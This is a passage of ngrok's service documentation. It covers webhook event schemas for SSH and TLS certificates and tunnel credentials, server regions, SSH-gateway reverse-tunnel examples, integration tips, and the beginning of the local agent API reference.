certificatestring

the signed SSH certificate in OpenSSH Authorized Keys format. this value should be placed in a -cert.pub certificate file on disk that should be referenced in your sshd_config configuration file with a HostCertificate directive

+
+
ssh_host_certificate_updated.v0
+

Triggers when an SSH host certificate is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH Host Certificate

+
uristring

URI of the SSH Host Certificate API resource

+
created_atstring

timestamp when the SSH Host Certificate API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH Host Certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH Host Certificate. optional, max 4096 bytes.

+
public_keystring

a public key in OpenSSH Authorized Keys format that this certificate signs

+
key_typestring

the key type of the public_key, one of rsa, ecdsa or ed25519

+
ssh_certificate_authority_idstring

the ssh certificate authority that is used to sign this ssh host certificate

+
principalsList<string>

the list of principals included in the ssh host certificate. This is the list of hostnames and/or IP addresses that are authorized to serve SSH traffic with this certificate. Dangerously, if no principals are specified, this certificate is considered valid for all hosts.

+
valid_afterstring

the time when the ssh host certificate becomes valid, in RFC 3339 format.

+
valid_untilstring

the time after which the ssh host certificate becomes invalid, in RFC 3339 format. the OpenSSH certificates RFC calls this valid_before.

+
certificatestring

the signed SSH certificate in OpenSSH Authorized Keys format. this value should be placed in a -cert.pub certificate file on disk that should be referenced in your sshd_config configuration file with a HostCertificate directive

+
+
ssh_public_key_created.v0
+

Triggers when an SSH public key is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique ssh credential resource identifier

+
uristring

URI of the ssh credential API resource

+
created_atstring

timestamp when the ssh credential was created, RFC 3339 format

+
descriptionstring

human-readable description of who or what will use the ssh credential to authenticate. Optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this ssh credential. Optional, max 4096 bytes.

+
public_keystring

the PEM-encoded public key of the SSH keypair that will be used to authenticate

+
aclList<string>

optional list of ACL rules. If unspecified, the credential will have no restrictions. The only allowed ACL rule at this time is the bind rule. The bind rule allows the caller to restrict what domains and addresses the token is allowed to bind. For example, to allow the token to open a tunnel on example.ngrok.io your ACL would include the rule bind:example.ngrok.io. Bind rules may specify a leading wildcard to match multiple domains with a common suffix. For example, you may specify a rule of bind:*.example.com which will allow x.example.com, y.example.com, *.example.com, etc. A rule of '*' is equivalent to no acl at all and will explicitly permit all actions.

+
+
ssh_public_key_deleted.v0
+

Triggers when an SSH public key is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique ssh credential resource identifier

+
uristring

URI of the ssh credential API resource

+
created_atstring

timestamp when the ssh credential was created, RFC 3339 format

+
descriptionstring

human-readable description of who or what will use the ssh credential to authenticate. Optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this ssh credential. Optional, max 4096 bytes.

+
public_keystring

the PEM-encoded public key of the SSH keypair that will be used to authenticate

+
aclList<string>

optional list of ACL rules. If unspecified, the credential will have no restrictions. The only allowed ACL rule at this time is the bind rule. The bind rule allows the caller to restrict what domains and addresses the token is allowed to bind. For example, to allow the token to open a tunnel on example.ngrok.io your ACL would include the rule bind:example.ngrok.io. Bind rules may specify a leading wildcard to match multiple domains with a common suffix. For example, you may specify a rule of bind:*.example.com which will allow x.example.com, y.example.com, *.example.com, etc. A rule of '*' is equivalent to no acl at all and will explicitly permit all actions.

+
+
ssh_public_key_updated.v0
+

Triggers when an SSH public key is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique ssh credential resource identifier

+
uristring

URI of the ssh credential API resource

+
created_atstring

timestamp when the ssh credential was created, RFC 3339 format

+
descriptionstring

human-readable description of who or what will use the ssh credential to authenticate. Optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this ssh credential. Optional, max 4096 bytes.

+
public_keystring

the PEM-encoded public key of the SSH keypair that will be used to authenticate

+
aclList<string>

optional list of ACL rules. If unspecified, the credential will have no restrictions. The only allowed ACL rule at this time is the bind rule. The bind rule allows the caller to restrict what domains and addresses the token is allowed to bind. For example, to allow the token to open a tunnel on example.ngrok.io your ACL would include the rule bind:example.ngrok.io. Bind rules may specify a leading wildcard to match multiple domains with a common suffix. For example, you may specify a rule of bind:*.example.com which will allow x.example.com, y.example.com, *.example.com, etc. A rule of '*' is equivalent to no acl at all and will explicitly permit all actions.

+
+
ssh_user_certificate_created.v0
+

Triggers when an SSH user certificate is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH User Certificate

+
uristring

URI of the SSH User Certificate API resource

+
created_atstring

timestamp when the SSH User Certificate API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH User Certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH User Certificate. optional, max 4096 bytes.

+
public_keystring

a public key in OpenSSH Authorized Keys format that this certificate signs

+
key_typestring

the key type of the public_key, one of rsa, ecdsa or ed25519

+
ssh_certificate_authority_idstring

the ssh certificate authority that is used to sign this ssh user certificate

+
principalsList<string>

the list of principals included in the ssh user certificate. This is the list of usernames that the certificate holder may sign in as on a machine authorizinig the signing certificate authority. Dangerously, if no principals are specified, this certificate may be used to log in as any user.

+
critical_optionsMap<string, string>

A map of critical options included in the certificate. Only two critical options are currently defined by OpenSSH: force-command and source-address. See the OpenSSH certificate protocol spec for additional details.

+
extensionsMap<string, string>

A map of extensions included in the certificate. Extensions are additional metadata that can be interpreted by the SSH server for any purpose. These can be used to permit or deny the ability to open a terminal, do port forwarding, x11 forwarding, and more. If unspecified, the certificate will include limited permissions with the following extension map: {"permit-pty": "", "permit-user-rc": ""} OpenSSH understands a number of predefined extensions. See the OpenSSH certificate protocol spec for additional details.

+
valid_afterstring

the time when the ssh host certificate becomes valid, in RFC 3339 format.

+
valid_untilstring

the time after which the ssh host certificate becomes invalid, in RFC 3339 format. the OpenSSH certificates RFC calls this valid_before.

+
certificatestring

the signed SSH certificate in OpenSSH Authorized Keys Format. this value should be placed in a -cert.pub certificate file on disk that should be referenced in your sshd_config configuration file with a HostCertificate directive

+
+
ssh_user_certificate_deleted.v0
+

Triggers when an SSH user certificate is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH User Certificate

+
uristring

URI of the SSH User Certificate API resource

+
created_atstring

timestamp when the SSH User Certificate API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH User Certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH User Certificate. optional, max 4096 bytes.

+
public_keystring

a public key in OpenSSH Authorized Keys format that this certificate signs

+
key_typestring

the key type of the public_key, one of rsa, ecdsa or ed25519

+
ssh_certificate_authority_idstring

the ssh certificate authority that is used to sign this ssh user certificate

+
principalsList<string>

the list of principals included in the ssh user certificate. This is the list of usernames that the certificate holder may sign in as on a machine authorizinig the signing certificate authority. Dangerously, if no principals are specified, this certificate may be used to log in as any user.

+
critical_optionsMap<string, string>

A map of critical options included in the certificate. Only two critical options are currently defined by OpenSSH: force-command and source-address. See the OpenSSH certificate protocol spec for additional details.

+
extensionsMap<string, string>

A map of extensions included in the certificate. Extensions are additional metadata that can be interpreted by the SSH server for any purpose. These can be used to permit or deny the ability to open a terminal, do port forwarding, x11 forwarding, and more. If unspecified, the certificate will include limited permissions with the following extension map: {"permit-pty": "", "permit-user-rc": ""} OpenSSH understands a number of predefined extensions. See the OpenSSH certificate protocol spec for additional details.

+
valid_afterstring

the time when the ssh host certificate becomes valid, in RFC 3339 format.

+
valid_untilstring

the time after which the ssh host certificate becomes invalid, in RFC 3339 format. the OpenSSH certificates RFC calls this valid_before.

+
certificatestring

the signed SSH certificate in OpenSSH Authorized Keys Format. this value should be placed in a -cert.pub certificate file on disk that should be referenced in your sshd_config configuration file with a HostCertificate directive

+
+
ssh_user_certificate_updated.v0
+

Triggers when an SSH user certificate is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this SSH User Certificate

+
uristring

URI of the SSH User Certificate API resource

+
created_atstring

timestamp when the SSH User Certificate API resource was created, RFC 3339 format

+
descriptionstring

human-readable description of this SSH User Certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this SSH User Certificate. optional, max 4096 bytes.

+
public_keystring

a public key in OpenSSH Authorized Keys format that this certificate signs

+
key_typestring

the key type of the public_key, one of rsa, ecdsa or ed25519

+
ssh_certificate_authority_idstring

the ssh certificate authority that is used to sign this ssh user certificate

+
principalsList<string>

the list of principals included in the ssh user certificate. This is the list of usernames that the certificate holder may sign in as on a machine authorizinig the signing certificate authority. Dangerously, if no principals are specified, this certificate may be used to log in as any user.

+
critical_optionsMap<string, string>

A map of critical options included in the certificate. Only two critical options are currently defined by OpenSSH: force-command and source-address. See the OpenSSH certificate protocol spec for additional details.

+
extensionsMap<string, string>

A map of extensions included in the certificate. Extensions are additional metadata that can be interpreted by the SSH server for any purpose. These can be used to permit or deny the ability to open a terminal, do port forwarding, x11 forwarding, and more. If unspecified, the certificate will include limited permissions with the following extension map: {"permit-pty": "", "permit-user-rc": ""} OpenSSH understands a number of predefined extensions. See the OpenSSH certificate protocol spec for additional details.

+
valid_afterstring

the time when the ssh host certificate becomes valid, in RFC 3339 format.

+
valid_untilstring

the time after which the ssh host certificate becomes invalid, in RFC 3339 format. the OpenSSH certificates RFC calls this valid_before.

+
certificatestring

the signed SSH certificate in OpenSSH Authorized Keys Format. this value should be placed in a -cert.pub certificate file on disk that should be referenced in your sshd_config configuration file with a HostCertificate directive

+
+
tcp_address_created.v0
+

Triggers when a TCP address is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique reserved address resource identifier

+
uristring

URI of the reserved address API resource

+
created_atstring

timestamp when the reserved address was created, RFC 3339 format

+
descriptionstring

human-readable description of what this reserved address will be used for

+
metadatastring

arbitrary user-defined machine-readable data of this reserved address. Optional, max 4096 bytes.

+
addrstring

hostname:port of the reserved address that was assigned at creation time

+
regionstring

reserve the address in this geographic ngrok datacenter. Optional, default is us. (au, eu, ap, us, jp, in, sa)

+
+
tcp_address_deleted.v0
+

Triggers when a TCP address is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique reserved address resource identifier

+
uristring

URI of the reserved address API resource

+
created_atstring

timestamp when the reserved address was created, RFC 3339 format

+
descriptionstring

human-readable description of what this reserved address will be used for

+
metadatastring

arbitrary user-defined machine-readable data of this reserved address. Optional, max 4096 bytes.

+
addrstring

hostname:port of the reserved address that was assigned at creation time

+
regionstring

reserve the address in this geographic ngrok datacenter. Optional, default is us. (au, eu, ap, us, jp, in, sa)

+
+
tcp_address_updated.v0
+

Triggers when a TCP address is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique reserved address resource identifier

+
uristring

URI of the reserved address API resource

+
created_atstring

timestamp when the reserved address was created, RFC 3339 format

+
descriptionstring

human-readable description of what this reserved address will be used for

+
metadatastring

arbitrary user-defined machine-readable data of this reserved address. Optional, max 4096 bytes.

+
addrstring

hostname:port of the reserved address that was assigned at creation time

+
regionstring

reserve the address in this geographic ngrok datacenter. Optional, default is us. (au, eu, ap, us, jp, in, sa)

+
+
tcp_connection_closed.v0
+

Triggers when a TCP connection to an endpoint closes.

+

+This event type supports filters and selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
conn.client_ipstringfilterable

The source IP of the TCP connection to the ngrok edge

+
conn.end_tstimestamp

The timestamp when the TCP connection to the ngrok edge is closed

+
conn.server_ipstringfilterable

The IP address of the server that received the request

+
conn.server_namestringfilterable

The hostname associated with this connection.

+
conn.server_portint32filterable

The port that the connection for this request came in on

+
conn.start_tstimestamp

The timestamp when the TCP connection to the ngrok edge is established

+
ip_policy.decisionstring

‘allow’ if IP Policy module permitted the request to the upstream service, ‘block’ otherwise

+
+
tls_certificate_created.v0
+

Triggers when a TLS certificate is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this TLS certificate

+
uristring

URI of the TLS certificate API resource

+
created_atstring

timestamp when the TLS certificate was created, RFC 3339 format

+
descriptionstring

human-readable description of this TLS certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this TLS certificate. optional, max 4096 bytes.

+
certificate_pemstring

chain of PEM-encoded certificates, leaf first. See Certificate Bundles.

+
subject_common_namestring

subject common name from the leaf of this TLS certificate

+
subject_alternative_names.dns_namesList<string>

set of additional domains (including wildcards) this TLS certificate is valid for

+
subject_alternative_names.ipsList<string>

set of IP addresses this TLS certificate is also valid for

+
issued_atstring

timestamp (in RFC 3339 format) when this TLS certificate was issued automatically, or null if this certificate was user-uploaded

+
not_beforestring

timestamp when this TLS certificate becomes valid, RFC 3339 format

+
not_afterstring

timestamp when this TLS certificate becomes invalid, RFC 3339 format

+
key_usagesList<string>

set of actions the private key of this TLS certificate can be used for

+
extended_key_usagesList<string>

extended set of actions the private key of this TLS certificate can be used for

+
private_key_typestring

type of the private key of this TLS certificate. One of rsa, ecdsa, or ed25519.

+
issuer_common_namestring

issuer common name from the leaf of this TLS certificate

+
serial_numberstring

serial number of the leaf of this TLS certificate

+
subject_organizationstring

subject organization from the leaf of this TLS certificate

+
subject_organizational_unitstring

subject organizational unit from the leaf of this TLS certificate

+
subject_localitystring

subject locality from the leaf of this TLS certificate

+
subject_provincestring

subject province from the leaf of this TLS certificate

+
subject_countrystring

subject country from the leaf of this TLS certificate

+
+
tls_certificate_deleted.v0
+

Triggers when a TLS certificate is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this TLS certificate

+
uristring

URI of the TLS certificate API resource

+
created_atstring

timestamp when the TLS certificate was created, RFC 3339 format

+
descriptionstring

human-readable description of this TLS certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this TLS certificate. optional, max 4096 bytes.

+
certificate_pemstring

chain of PEM-encoded certificates, leaf first. See Certificate Bundles.

+
subject_common_namestring

subject common name from the leaf of this TLS certificate

+
subject_alternative_names.dns_namesList<string>

set of additional domains (including wildcards) this TLS certificate is valid for

+
subject_alternative_names.ipsList<string>

set of IP addresses this TLS certificate is also valid for

+
issued_atstring

timestamp (in RFC 3339 format) when this TLS certificate was issued automatically, or null if this certificate was user-uploaded

+
not_beforestring

timestamp when this TLS certificate becomes valid, RFC 3339 format

+
not_afterstring

timestamp when this TLS certificate becomes invalid, RFC 3339 format

+
key_usagesList<string>

set of actions the private key of this TLS certificate can be used for

+
extended_key_usagesList<string>

extended set of actions the private key of this TLS certificate can be used for

+
private_key_typestring

type of the private key of this TLS certificate. One of rsa, ecdsa, or ed25519.

+
issuer_common_namestring

issuer common name from the leaf of this TLS certificate

+
serial_numberstring

serial number of the leaf of this TLS certificate

+
subject_organizationstring

subject organization from the leaf of this TLS certificate

+
subject_organizational_unitstring

subject organizational unit from the leaf of this TLS certificate

+
subject_localitystring

subject locality from the leaf of this TLS certificate

+
subject_provincestring

subject province from the leaf of this TLS certificate

+
subject_countrystring

subject country from the leaf of this TLS certificate

+
+
tls_certificate_updated.v0
+

Triggers when a TLS certificate is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique identifier for this TLS certificate

+
uristring

URI of the TLS certificate API resource

+
created_atstring

timestamp when the TLS certificate was created, RFC 3339 format

+
descriptionstring

human-readable description of this TLS certificate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this TLS certificate. optional, max 4096 bytes.

+
certificate_pemstring

chain of PEM-encoded certificates, leaf first. See Certificate Bundles.

+
subject_common_namestring

subject common name from the leaf of this TLS certificate

+
subject_alternative_names.dns_namesList<string>

set of additional domains (including wildcards) this TLS certificate is valid for

+
subject_alternative_names.ipsList<string>

set of IP addresses this TLS certificate is also valid for

+
issued_atstring

timestamp (in RFC 3339 format) when this TLS certificate was issued automatically, or null if this certificate was user-uploaded

+
not_beforestring

timestamp when this TLS certificate becomes valid, RFC 3339 format

+
not_afterstring

timestamp when this TLS certificate becomes invalid, RFC 3339 format

+
key_usagesList<string>

set of actions the private key of this TLS certificate can be used for

+
extended_key_usagesList<string>

extended set of actions the private key of this TLS certificate can be used for

+
private_key_typestring

type of the private key of this TLS certificate. One of rsa, ecdsa, or ed25519.

+
issuer_common_namestring

issuer common name from the leaf of this TLS certificate

+
serial_numberstring

serial number of the leaf of this TLS certificate

+
subject_organizationstring

subject organization from the leaf of this TLS certificate

+
subject_organizational_unitstring

subject organizational unit from the leaf of this TLS certificate

+
subject_localitystring

subject locality from the leaf of this TLS certificate

+
subject_provincestring

subject province from the leaf of this TLS certificate

+
subject_countrystring

subject country from the leaf of this TLS certificate

+
+
tunnel_credential_created.v0
+

Triggers when a tunnel credential is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique tunnel credential resource identifier

+
uristring

URI of the tunnel credential API resource

+
created_atstring

timestamp when the tunnel credential was created, RFC 3339 format

+
descriptionstring

human-readable description of who or what will use the credential to authenticate. Optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this credential. Optional, max 4096 bytes.

+
tokenstring

the credential’s authtoken that can be used to authenticate an ngrok client. This value is only available one time, on the API response from credential creation, otherwise it is null.

+
aclList<string>

optional list of ACL rules. If unspecified, the credential will have no restrictions. The only allowed ACL rule at this time is the bind rule. The bind rule allows the caller to restrict what domains and addresses the token is allowed to bind. For example, to allow the token to open a tunnel on example.ngrok.io your ACL would include the rule bind:example.ngrok.io. Bind rules may specify a leading wildcard to match multiple domains with a common suffix. For example, you may specify a rule of bind:*.example.com which will allow x.example.com, y.example.com, *.example.com, etc. A rule of '*' is equivalent to no acl at all and will explicitly permit all actions.

+
+
tunnel_credential_deleted.v0
+

Triggers when a tunnel credential is deleted

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique tunnel credential resource identifier

+
uristring

URI of the tunnel credential API resource

+
created_atstring

timestamp when the tunnel credential was created, RFC 3339 format

+
descriptionstring

human-readable description of who or what will use the credential to authenticate. Optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this credential. Optional, max 4096 bytes.

+
tokenstring

the credential’s authtoken that can be used to authenticate an ngrok client. This value is only available one time, on the API response from credential creation, otherwise it is null.

+
aclList<string>

optional list of ACL rules. If unspecified, the credential will have no restrictions. The only allowed ACL rule at this time is the bind rule. The bind rule allows the caller to restrict what domains and addresses the token is allowed to bind. For example, to allow the token to open a tunnel on example.ngrok.io your ACL would include the rule bind:example.ngrok.io. Bind rules may specify a leading wildcard to match multiple domains with a common suffix. For example, you may specify a rule of bind:*.example.com which will allow x.example.com, y.example.com, *.example.com, etc. A rule of '*' is equivalent to no acl at all and will explicitly permit all actions.

+
+
tunnel_credential_updated.v0
+

Triggers when a tunnel credential is updated

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique tunnel credential resource identifier

+
uristring

URI of the tunnel credential API resource

+
created_atstring

timestamp when the tunnel credential was created, RFC 3339 format

+
descriptionstring

human-readable description of who or what will use the credential to authenticate. Optional, max 255 bytes.

+
metadatastring

arbitrary user-defined machine-readable data of this credential. Optional, max 4096 bytes.

+
tokenstring

the credential’s authtoken that can be used to authenticate an ngrok client. This value is only available one time, on the API response from credential creation, otherwise it is null.

+
aclList<string>

optional list of ACL rules. If unspecified, the credential will have no restrictions. The only allowed ACL rule at this time is the bind rule. The bind rule allows the caller to restrict what domains and addresses the token is allowed to bind. For example, to allow the token to open a tunnel on example.ngrok.io your ACL would include the rule bind:example.ngrok.io. Bind rules may specify a leading wildcard to match multiple domains with a common suffix. For example, you may specify a rule of bind:*.example.com which will allow x.example.com, y.example.com, *.example.com, etc. A rule of '*' is equivalent to no acl at all and will explicitly permit all actions.

+
+

Event Destinations

+

An Event Destination specifies a service and any required configuration for it to receive Events data. You can send a set of Events to one or more Destinations. Currently, you can configure your Destinations to send Events to the following services:

+
    +
  • AWS CloudWatch Logs
  • +
  • AWS Kinesis Data Streams
  • +
  • AWS Kinesis Firehose Delivery Streams
  • +
+

Note that Kinesis Firehose can deliver events into an S3 bucket.

+

Events Payloads

+

Events are sent as JSON to configured destinations. All events include the following fields:

+ + + + + + + + + + + + + + + + + + + + + + + + + + +
NameDescriptionExample
event_idunique identifier for this event, always prefixed with ev_ev_1vPlyBW3OR44bpPphS4HIZyajDD
event_typeidentifies the object, action, and version of the eventip_policy_created.v0
event_timestamptimestamp of when the event fired in RFC 3339 format2021-07-16T21:44:37Z
objecta json object describing the resource where the event occurred{
+ "id": "ipp_1vPlyF4iyQj82hjSv67dRkV8woI",
+ "uri": "https://api.ngrok.com/ip_policies/ipp_1vPlyF4iyQj82hjSv67dRkV8woI",
+ "created_at": "2021-07-16T21:44:16Z",
+ "description": "bar",
+ "metadata": "",
+ "action": "allow"
+ }
+ +

Global infrastructure

+

ngrok runs globally distributed tunnel servers around the world to enable fast, low latency traffic + to your applications. +

+

Locations

+

ngrok runs tunnel servers in datacenters around the world. The location of the datacenter within + a given region may change without notice (e.g. the European servers may move from Frankfurt to London). +

+
    +
  • +
    us - United States (Ohio)
    +
  • +
  • +
    eu - Europe (Frankfurt)
    +
  • +
  • +
    ap - Asia/Pacific (Singapore)
    +
  • +
  • +
    au - Australia (Sydney)
    +
  • +
  • +
    sa - South America (Sao Paulo)
    +
  • +
  • +
    jp - Japan (Tokyo)
    +
  • +
  • +
    in - India (Mumbai)
    +
  • +
+

Usage

+

If you do not explicitly pick a region, your tunnel will be hosted in the default region, the United States. Picking the region + closest to you is as easy as specifying setting the -region command line flag or setting the region property in your configuration file. + For example, to start a tunnel in the Europe region: +

+
+
ngrok http -region eu 8080
+
+

Reserved domains and reserved addresses are allocated for a specific region (the US region by default). When you reserve a domain + or address, you must select a target region. You may not bind a domain or address reserved in another region other than the one it + was allocated for. Attempting to do so will yield an error and prevent your tunnel session from initializing. +

+

Limitations

+

An ngrok client may only be connected a single region. This may change in the future, but at the moment a single + ngrok client cannot host tunnels in multiple regions simultaneously. Run multiple ngrok clients if you need to do this. +

+

A domain cannot be reserved for multiple regions simultaneously. It is not possible to geo-balance DNS + to the same tunnel name in multiple regions. Use region-specific subdomains or TLDs if you need to do this + (eu.tunnel.example.com, us.tunnel.example.com, etc). +

+ +

SSH Gateway

+

SSH reverse tunneling is an alternative mechanism to start an ngrok tunnel without even needing to download + or run the ngrok client. You can start tunnels via SSH without downloading an ngrok client by running an SSH reverse tunnel + command. +

+

The SSH gateway functionality should not be confused with exposing an SSH server via ngrok. If you want to expose your own SSH + server for remote access, please refer to the documentation on TCP tunnels. +

+

Uploading a Public Key

+

Before you can start a tunnel via the SSH gateway, you'll need to upload your SSH public key. To upload your SSH public key, open the file + ~/.ssh/id_rsa.pub and copy its contents. Then go to the Auth tab on your dashboard and paste the contents + into the SSH Key input and optionally enter a human description (like the name of your machine). You should now be able to start SSH tunnels! +

+
Copy your SSH public key on Mac OS X
+
+
cat ~/.ssh/id_rsa.pub | pbcopy
+
+
Add your SSH key by pasting it into the ngrok dashboard.
+ +

Examples

+

+ ngrok tries to honor the syntax of ssh -R for all of the tunnel commands in its SSH gateway. You may wish to consult man ssh, + and the section devoted to the -R option for additional details. ngrok uses additional command line options to implement features that are + not otherwise available via the -R syntax. +

+

+ The following examples demonstrate how to use the SSH gateway and provide the equivalent ngrok client command to help + you best understand how to achieve similar functionality. +

+ +
Start an http tunnel forwarding to port 80
+
+
# equivalent: `ngrok http 80`
+ssh -R 80:localhost:80 tunnel.us.ngrok.com http
+
+
Start an http tunnel on a custom subdomain forwarding to port 8080
+
+
# equivalent: `ngrok http -subdomain=custom-subdomain 8080`
+ssh -R custom-subdomain.ngrok.io:80:localhost:8080 tunnel.us.ngrok.com http
+
+
Start an http tunnel on a custom domain with auth
+
+
# equivalent: `ngrok http -hostname=example.com 8080`
+ssh -R example.com:80:localhost:8080 tunnel.us.ngrok.com http -auth="user:password"
+
+
Start a TCP tunnel
+
+
# equivalent: `ngrok tcp 22`
+ssh -R 0:localhost:22 tunnel.us.ngrok.com tcp 22
+
+
Start a TCP tunnel on a reserved address
+
+
# equivalent: `ngrok tcp --remote-addr=1.tcp.ngrok.io:24313 22`
+ssh -R 1.tcp.ngrok.io:24313:localhost:22 tunnel.us.ngrok.com tcp
+
+
Start a TLS tunnel
+
+
# equivalent: `ngrok tls 8443`
+ssh -R 443:localhost:8443 tunnel.us.ngrok.com tls
+
+
Start a tunnel in a different region
+
+
# equivalent: `ngrok http -region=eu 80`
+ssh -R 80:localhost:80 tunnel.eu.ngrok.com http
+
+ +

Using ngrok with …

+

Wordpress

+

+ To make ngrok work properly with Wordpress installations you usually need to do two things: +

    +
  1. + You must ensure that Wordpress issues relative URLS. You can do so by installing the following plugin:
  2. + + +
  3. + You must ensure that Wordpress understands that it is meant to serve itself from your tunneled hostname. You can configure + Wordpress to do that by modifying your `wp-config` to include the following lines: +
    +
    +
    define('WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST']);
    +define('WP_HOME', 'http://' . $_SERVER['HTTP_HOST']);
    +
    +
  4. +
  5. + You must also instruct ngrok to rewrite the host header, like so: +
    ngrok http -host-header=rewrite https://your-site.dev
    +
  6. +
+

+

Virtual hosts (MAMP, WAMP, etc)

+

+ Popular web servers such as MAMP and WAMP rely on a technique popularly referred to as 'Virtual Hosting' which means that they consult the HTTP request's Host + header to determine which of their multiple sites they should serve. To expose a site like this it is possible to ask ngrok to rewrite the Host header + of all tunneled requests to match what your web server expects. You can do this by using the -host-header option (see: Rewriting the Host header) + to pick which virtual host you want to target. For example, to route to your local site myapp.dev, you would run: +

ngrok http -host-header=myapp.dev 80
+

+

Visual Studio / IIS Express

+

+ Use dproterho's visual studio extension which adds ngrok support directly into Visual Studio: + ngrok extension for Visual Studio +

+

VSCode

+

+ Use nash's VSCode extension which adds ngrok support directly into VSCode: + ngrok extension for VSCode +

+

An outbound proxy

+

+ ngrok works correctly through an HTTP or SOCKS5 proxy. ngrok respects the standard unix environment variable http_proxy. You may also set proxy + configuration explicitly in the ngrok configuration file: +

+

+

node.js

+

+ Use bubenshchykov's npm package for interacting with ngrok from node.js: +

+

+

Puppet

+

+ Use gabe's puppet module for installing and configuring ngrok resources and ensure the ngrok client process is running: + ngrok module for Puppet +

+

Troubleshooting

+

CORS with HTTP basic authentication

+

+ Yes, but you cannot use ngrok's -auth option. ngrok's http tunnels allow you to specify basic authentication credentials to protect your tunnels. However, ngrok enforces this policy on *all* requests, including the preflight OPTIONS requests that are required by the CORS spec. In this case, your application must implement its own basic authentication. For more details, see this github issue. +

+

ngrok Agent API

+

The ngrok client exposes an HTTP API that grants programmatic access to:

+
    +
  • Collect status and metrics information
  • +
  • Collect and replay captured requests
  • +
  • Start and stop tunnels dynamically
  • +
+

Base URL and Authentication

+ + + + + + + + + +
Base URLhttp://127.0.0.1:4040/api +
AuthenticationNone +
+

The ngrok agent API is exposed as part of ngrok's local web inspection interface. Because it is served on a local interface, + the API has no authentication. The Base URL will change if you override web_addr in your configuration file. +

+
Access the root API resource of a running ngrok client
+
+
curl http://localhost:4040/api/
+
+

Supported Content Types

+

Request parameters must be encoded to the API using application/json. + Ensure that your client sets the request's Content-Type header appropriately. + All responses returned by the API are application/json. +

+

Versioning and API Stability

+

The ngrok agent API guarantees that breaking changes to the API will never be made unless the caller explicitly opts in to a newer version. + The mechanism by which a caller opts into a new version of the API will be determined in the future when it becomes necessary. + Examples of non-breaking changes to the API that will not be opt-in include the following. +

+
    +
  • The addition of new resources
  • +
  • The addition of new methods to existing resources
  • +
  • The addition of new fields on existing resource representations
  • +
  • Bug fixes which change the API to match documented behavior
  • +
+
+

List Tunnels

+

Returns a list of running tunnels with status and metrics information.

+
Request
+
GET/api/tunnels +
+
Response
+
Parameters
+ + + + + +
tunnels + list of all running tunnels. See the Tunnel detail resource for docs on the parameters of each tunnel object
+
Example Response
+
+
{
+  "tunnels": [
+      {
+          "name": "command_line",
+          "uri": "/api/tunnels/command_line",
+          "public_url": "https://d95211d2.ngrok.io",
+          "proto": "https",
